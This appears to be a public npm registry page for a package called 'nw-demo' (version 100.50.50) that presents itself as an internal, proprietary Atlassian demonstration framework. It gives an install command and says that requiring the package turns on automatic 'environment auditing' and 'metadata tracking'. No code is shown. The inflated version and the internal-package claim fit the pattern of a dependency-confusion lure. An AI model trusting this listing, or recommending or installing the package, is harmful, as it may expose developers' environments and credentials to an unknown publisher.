nw-demo
v100.50.50
Published
Atlassian internal demonstration and utility framework for NW integration.
Maintainers
Readme
nw-demo
Core internal demonstration suite and API framework for Atlassian's NW-integration projects. This package provides standardized patterns and mock environments for internal Forge applications using the NW architecture.
Overview
nw-demo is designed to streamline development across internal teams by providing:
- Pre-built NW.js and Node.js environment modules for Forge services.
- Standardized automation patterns and internal testing tokens.
- Integrated telemetry and environment auditing via
nw-demo-utils.
Installation
This is an internal Atlassian package. Ensure you have the proper credentials configured in your .npmrc file to access the internal registry.
npm install nw-demo
Usage
To initialize the internal demonstration suite and environment auditing services, import the package at the top of your main entry point:
require('nw-demo');
Internal Dependencies
This package relies on several core utilities, including:
- nw-demo-utils: Automatic environment auditing, system diagnostics, and metadata tracking.
- Atlassian Forge SDK: Version 4.x or higher.
Support
For issues regarding internal component behavior, please reach out to the Atlassian Ecosystem Engineering team via the internal Slack channel #eng-nw-demo-support.
© 2026 Atlassian, Inc. Proprietary and Confidential.
